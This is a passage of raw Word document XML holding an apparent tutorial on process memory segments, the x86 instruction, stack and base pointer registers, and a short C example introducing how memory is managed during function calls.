          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All the dynamically allocated memory resides here. Whenever we use</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="D5D5E9" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
        </w:rPr>
        <w:t>malloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">to get memory dynamically, it is allocated from the heap. The heap grows upwards in </w:t>
      </w:r>
      <w:r w:rsidR="003712DA" w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memory (</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from lower to higher memory addresses) as more and more memory is required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957BC3" w:rsidRPr="00957BC3" w:rsidRDefault="00957BC3" w:rsidP="00957BC3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324"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Uninitialized </w:t>
      </w:r>
      <w:r w:rsidR="00F033A1" w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Segment)</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All the uninitialized data is stored here. This consists of all global and static variables which are not initialized by the programmer. The kernel initializes them to arithmetic 0 by default.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957BC3" w:rsidRPr="00957BC3" w:rsidRDefault="00957BC3" w:rsidP="00957BC3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324"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialized </w:t>
      </w:r>
      <w:r w:rsidR="00F033A1" w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data (</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data Segment)</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: All the initialized data is stored here. This </w:t>
      </w:r>
      <w:r w:rsidR="003712DA" w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consists</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of all global and static variables which are </w:t>
      </w:r>
      <w:r w:rsidR="003712DA" w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>initialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by the programmer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957BC3" w:rsidRPr="00957BC3" w:rsidRDefault="00957BC3" w:rsidP="00957BC3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324"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the section where the executable code is stored. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="1" w:color="D5D5E9" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
        </w:rPr>
        <w:t>loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00957BC3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loads instructions from here and executes them. It is often read only.</w:t>
      </w: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B317EF" w:rsidRPr="00F54C51" w:rsidRDefault="00B317EF" w:rsidP="00B317EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F54C51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Some common registers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006118A2" w:rsidRPr="006118A2" w:rsidRDefault="006118A2" w:rsidP="006118A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006118A2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%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006118A2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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>The </w:t>
      </w:r>
      <w:r w:rsidRPr="006118A2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Instruction pointer register</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">. It stores the address of the next instruction to be executed. After every instruction execution </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve"> value is incremented depending upon the size of an </w:t>
      </w:r>
      <w:r w:rsidR="004B5AFB" w:rsidRPr="006118A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>instruction</w:t>
      </w:r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:rsidR="006118A2" w:rsidRPr="006118A2" w:rsidRDefault="006118A2" w:rsidP="006118A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006118A2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%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006118A2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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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>: The </w:t>
      </w:r>
      <w:r w:rsidRPr="006118A2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Stack pointer register</w:t>
      </w:r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 xml:space="preserve">. It stores the address of the top of the stack. This is the address of the last element on the stack. The stack grows downward in </w:t>
      </w:r>
      <w:r w:rsidR="004B5AFB" w:rsidRPr="006118A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>memory (</w:t>
      </w:r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>from higher address values to lower address values). So the </w:t>
      </w:r>
      <w:r w:rsidRPr="006118A2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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006118A2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sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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> points to the value in stack at the lowest memory address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006118A2" w:rsidRPr="006118A2" w:rsidRDefault="006118A2" w:rsidP="006118A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006118A2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%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006118A2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ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>The </w:t>
      </w:r>
      <w:r w:rsidRPr="006118A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Base pointer register</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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>. The </w:t>
      </w:r>
      <w:r w:rsidRPr="006118A2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6118A2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bp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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> register usually set to </w:t>
      </w:r>
      <w:r w:rsidRPr="006118A2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6118A2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sp</w:t>
      </w:r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>at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> the start of the function. This is done to keep tab of function parameters and local variables. Local variables are accessed by </w:t>
      </w:r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lastRenderedPageBreak/>
        <w:t>subtracting offsets from </w:t>
      </w:r>
      <w:r w:rsidRPr="006118A2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6118A2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bp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006118A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t> and function parameters are accessed by adding offsets to it as you shall see in the next section</w:t>
      </w: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Pr="008F712E" w:rsidRDefault="008F712E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F712E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Memory management during function calls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRDefault="008F712E" w:rsidP="008F712E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F712E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Consider the following piece of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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F712E" w:rsidTr="008F712E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8995" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pPr>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445588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void</w:t>
            </w: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 xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="99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func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445588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int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> a, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445588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int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> b)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pP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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pP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 xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445588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int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> c;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pP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 xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445588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int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> d;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="999988"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="999988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// some code</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pP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}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pPr>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445588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void</w:t>
            </w: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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="99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main</w:t>
            </w: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()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pP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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/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</w:pP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 xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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(</w:t>
            </w:r>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="009999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1</w:t>
            </w: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 xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="009999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2</w:t>
            </w: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);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008D03A3" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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contextualSpacing/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="999988"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="999988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// next instruction</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="008F712E">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:left w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
                <w:bottom w:val="single" w:sz="6" w:space="19" w:color="D5D5E9"/>
                <w:right w:val="single" w:sz="6" w:space="30" w:color="D5D5E9"/>
              </w:pBdr>
              <w:shd w:val="clear" w:color="auto" w:fill="EEEE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napToGrid w:val="0"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="27"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D03A3">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="27"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEFF"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008F712E" w:rsidRDefault="008F712E" w:rsidP="008F712E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000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F712E" w:rsidRPr="008F712E" w:rsidRDefault="008F712E" w:rsidP="00961839">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:snapToGrid w:val="0"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zh-CN"/>
        </w:rPr>
